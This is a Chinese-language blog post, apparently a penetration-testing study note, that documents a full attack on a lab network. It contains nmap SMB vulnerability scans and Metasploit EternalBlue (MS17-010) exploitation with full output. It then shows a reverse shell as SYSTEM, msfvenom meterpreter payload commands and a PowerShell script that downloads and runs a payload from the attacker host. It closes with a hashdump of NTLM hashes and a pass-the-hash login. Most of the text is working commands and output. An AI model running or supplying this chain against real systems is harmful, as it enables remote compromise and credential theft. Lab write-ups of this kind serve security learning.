0x00 前言
很久没有更新博客了,主要是因为工作很忙,写博客也太耗时间了。但是突然发现,许久不写很多东西都快生疏了。因而决定从今天起开始写一些跟渗透测试相关的文章,也可以认为是学习笔记吧,留作日后的技术积累和参考吧。
0x01 案列分析
实验环境:
目标靶机:10.11.1.0/24
攻击机:Kali Linux (10.11.0.79)
信息收集:
扫描存在smb服务的主机:
# nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt # cat smb_service.txt | grep -i windows | cut -d" " -f2 10.11.1.5 10.11.1.31 10.11.1.49 10.11.1.50 10.11.1.73 10.11.1.128 10.11.1.145 10.11.1.202 10.11.1.218 10.11.1.220 10.11.1.223 10.11.1.227 10.11.1.229 10.11.1.230 # cat smb_service.txt | grep -i open | cut -d" " -f2 > smb_server_all.txt |
扫描存在smb漏洞的主机:
# find / -name smb*vuln*.nse /usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse /usr/share/nmap/scripts/smb-vuln-ms06-025.nse /usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse /usr/share/nmap/scripts/smb-vuln-ms07-029.nse /usr/share/nmap/scripts/smb-vuln-ms17-010.nse /usr/share/nmap/scripts/smb-vuln-conficker.nse /usr/share/nmap/scripts/smb-vuln-ms08-067.nse /usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse /usr/share/nmap/scripts/smb-vuln-ms10-054.nse /usr/share/nmap/scripts/smb-vuln-ms10-061.nse # for vul in $(find / -name smb*vuln*.nse | cut -d"/" -f 6); do nmap -v -p 139,445 --script=$vul -iL smb_server_all.txt -oN smb_vulns_$vul.txt; done # cat smb_vulns_smb-vuln-*.txt | grep IDs: | IDs: CVE:CVE-2009-3103 | IDs: CVE:CVE-2009-3103 | IDs: CVE:CVE-2009-3103 | IDs: CVE:CVE-2009-3103 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 | IDs: CVE:CVE-2017-0143 |
漏洞利用:
检查并验证存在smb ms17-010漏洞的主机:
# cat ../scripts/smb_vulns_smb-vuln-ms17-010.nse.txt # Nmap 7.50 scan initiated Mon Jul 3 13:57:06 2017 as: nmap -v -p 139,445 --script=smb-vuln-ms17-010.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-ms17-010.nse.txt Nmap scan report for 10.11.1.5 Host is up (0.24s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:89:35:AF (VMware) Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 ... ... Nmap scan report for 10.11.1.220 Host is up (0.24s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:89:15:14 (VMware) Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 ... ... Nmap scan report for 10.11.1.230 Host is up (0.25s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:50:56:89:5C:19 (VMware) Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Read data files from: /usr/bin/../share/nmap # Nmap done at Mon Jul 3 13:57:53 2017 -- 19 IP addresses (19 hosts up) scanned in 46.85 seconds |
IP: 10.11.1.5 利用失败
msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.5 RHOST => 10.11.1.5 msf exploit(ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.11.0.79:4444 [*] 10.11.1.5:445 - Connecting to target for exploitation. [+] 10.11.1.5:445 - Connection established for exploitation. [!] 10.11.1.5:445 - Target OS selected not valid for OS indicated by SMB reply [!] 10.11.1.5:445 - Disable VerifyTarget option to proceed manually... [-] 10.11.1.5:445 - Unable to continue with improper OS Target. [*] Exploit completed, but no session was created. |
IP: 10.11.1.230 同样地,利用失败了
msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.230 RHOST => 10.11.1.230 msf exploit(ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.11.0.79:4444 [*] 10.11.1.230:445 - Connecting to target for exploitation. [+] 10.11.1.230:445 - Connection established for exploitation. [+] 10.11.1.230:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.11.1.230:445 - CORE raw buffer dump (25 bytes) [*] 10.11.1.230:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 10.11.1.230:445 - 0x00000010 74 65 20 4e 20 37 36 30 30 te N 7600 [!] 10.11.1.230:445 - Target arch selected not valid for arch indicated by DCE/RPC reply [!] 10.11.1.230:445 - Disable VerifyArch option to proceed manually... [-] 10.11.1.230:445 - Unable to continue with improper OS Arch. [*] Exploit completed, but no session was created. |
IP: 10.11.1.220 成功利用并反弹了一个shell回来
msf exploit(ms17_010_eternalblue) > set RHOST 10.11.1.220 RHOST => 10.11.1.220 msf exploit(ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.11.0.79:4444 [*] 10.11.1.220:445 - Connecting to target for exploitation. [+] 10.11.1.220:445 - Connection established for exploitation. [+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes) [*] 10.11.1.220:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.11.1.220:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 10.11.1.220:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 10.11.1.220:445 - 0x00000030 6b 20 31 k 1 [+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations. [*] 10.11.1.220:445 - Sending all but last fragment of exploit packet [*] 10.11.1.220:445 - Starting non-paged pool grooming [+] 10.11.1.220:445 - Sending SMBv2 buffers [+] 10.11.1.220:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.11.1.220:445 - Sending final SMBv2 buffers. [*] 10.11.1.220:445 - Sending last fragment of exploit packet! [*] 10.11.1.220:445 - Receiving response from exploit packet [+] 10.11.1.220:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.11.1.220:445 - Sending egg to corrupted connection. [*] 10.11.1.220:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened (10.11.0.79:4444 -> 10.11.1.220:62009) at 2017-07-04 03:08:40 -0400 [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system |
后渗透利用:
在上一步中我们成功地从IP:10.11.1.220上反弹了一个shell回来,但很显然这不是一个完美的交互式的shell且不稳定可靠,那么接下来我们该怎么办呢?首先,我们想到的是获得一个功能更加强大且稳定可靠的meterpreter。
检查目标系统的操作系统版本:
C:\Windows\system32>dir c:\ dir c:\ Volume in drive C has no label. Volume Serial Number is A49A-E592 Directory of c:\ 12/27/2013 11:37 PM <DIR> Ftp Root 07/13/2009 07:20 PM <DIR> PerfLogs 12/28/2013 02:15 AM <DIR> Program Files 12/28/2013 10:03 PM <DIR> Program Files (x86) 12/27/2013 11:37 PM <DIR> temp 08/02/2012 01:59 PM <DIR> Users 12/27/2013 11:37 PM <DIR> Windows 0 File(s) 0 bytes 7 Dir(s) 28,860,628,992 bytes free |
显然目标系统是一个64位的Windows server 2008的服务器。
接下来,生成一个64位windows的meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<listen port> -f exe -a x64 --platform win -o mp_64.exe 注:32位的windows的meterpreter payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<listen port> -f exe -a x86 --platform win -o mp_86.exe 上传meterpreter payload (mp_64.exe) 至攻击机的web目录中(/var/www/html/payload)以便目标机可以通过http链接来下载它。 重新开启一个msfconsole并开启监听。 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 10.11.0.79 LHOST => 10.11.0.79 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > run [*] Started reverse TCP handler on 10.11.0.79:8080 [*] Starting the payload handler... |
利用反弹的shell创建用于下载我们准备好的meterpreter payload的powershell脚本,然后执行脚本下载payload(mp_64.exe)并执行。
c:\Users\Administrator\Desktop>echo $storageDir=$pwd > wget.ps1 echo $storageDir=$pwd > wget.ps1 c:\Users\Administrator\Desktop>echo $webclient=New-Object System.Net.WebClient >>wget.ps1 echo $webclient=New-Object System.Net.WebClient >>wget.ps1 c:\Users\Administrator\Desktop>echo $url="http://10.11.0.79/payload/mp_64.exe" >>wget.ps1 echo $url="http://10.11.0.79/payload/mp_64.exe" >>wget.ps1 c:\Users\Administrator\Desktop>echo $file="mp_64.exe" >>wget.ps1 echo $file="mp_64.exe" >>wget.ps1 c:\Users\Administrator\Desktop>echo $webclient.DownloadFile($url,$file) >>wget.ps1 echo $webclient.DownloadFile($url,$file) >>wget.ps1 c:\Users\Administrator\Desktop>type wget.ps1 type wget.ps1 $storageDir=$pwd $webclient=New-Object System.Net.WebClient $url="http://10.11.0.79/payload/mp_64.exe" $file="mp_64.exe" $webclient.DownloadFile($url,$file) c:\Users\Administrator\Desktop>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 c:\Users\Administrator\Desktop>mp_64.exe |
至此,我们成功地获得了一个功能强大的meterpreter,并可以很容易去dump hash为更进一步的渗透做准备。
msf exploit(handler) > exploit [*] Started reverse TCP handler on 10.11.0.79:8080 [*] Starting the payload handler... [*] Sending stage (1189423 bytes) to 10.11.1.220 [*] Meterpreter session 1 opened (10.11.0.79:8080 -> 10.11.1.220:49326) at 2017-08-09 03:57:36 -0400 meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values help Help menu info Displays information about a Post module irb Drop into irb scripting mode load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for 'load' uuid Get the UUID for the current session write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files show_mount List all mount points/logical drives upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- arp Display the host ARP cache getproxy Display the current proxy configuration ifconfig Display interfaces ipconfig Display interfaces netstat Display the network connections portfwd Forward a local port to a remote service resolve Resolve a set of host names on the target route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getenv Get one or more environment variable values getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getsid Get the SID of the user that the server is running as getuid Get the user that the server is running as kill Terminate a process localtime Displays the target system's local date and time pgrep Filter processes by name pkill Terminate processes by name ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process suspend Suspends or resumes a list of processes sysinfo Gets information about the remote system, such as OS Stdapi: User interface Commands =============================== Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam Priv: Elevate Commands ====================== Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system. Priv: Password database Commands ================================ Command Description ------- ----------- hashdump Dumps the contents of the SAM database Priv: Timestomp Commands ======================== Command Description ------- ----------- timestomp Manipulate file MACE attributes meterpreter > screenshot meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bca55919186bf4443840164612ce9f77::: kevin:1106:aad3b435b51404eeaad3b435b51404ee:aef3d57f355a02297fc386630a01449e::: robert:1110:aad3b435b51404eeaad3b435b51404ee:0d3f32016ee8a42ba768d558875d57e5::: avfisher:1120:aad3b435b51404eeaad3b435b51404ee:ef28083240cb79a25adb4290ce6cb67b::: MASTER$:1000:aad3b435b51404eeaad3b435b51404ee:e0a6ad80117cbe539c459dafc5291f27::: SLAVE$:1103:aad3b435b51404eeaad3b435b51404ee:789cf984d53d9616fca933d37e974209::: OBSERVER$:1111:aad3b435b51404eeaad3b435b51404ee:d60552ce7c9dc4fabdf0ba4e5fc46f69::: |
补充:
拿到了Hash之后我们就可以进行Pass The Hash攻击了,例如,从上一步我们可以看到Administrator的NTLM hash是 aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e, 因此可以直接利用这个Hash登陆目标机器10.11.1.220:
# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e # pth-winexe -U Administrator% //10.11.1.220 cmd E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH... Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami thinc\administrator C:\Windows\system32> |
0x03 小结
总结一下本案例中的渗透思路:
利用nmap批量扫描开放smb服务端口的主机
利用nmap扫描存在smb漏洞的服务主机
利用ms17-010验证和攻击目标主机并反弹shell
制作更加稳定可靠的meterpreter payload
利用powershell脚本下载meterpreter并执行
获得meterpreter为进一步渗透做准备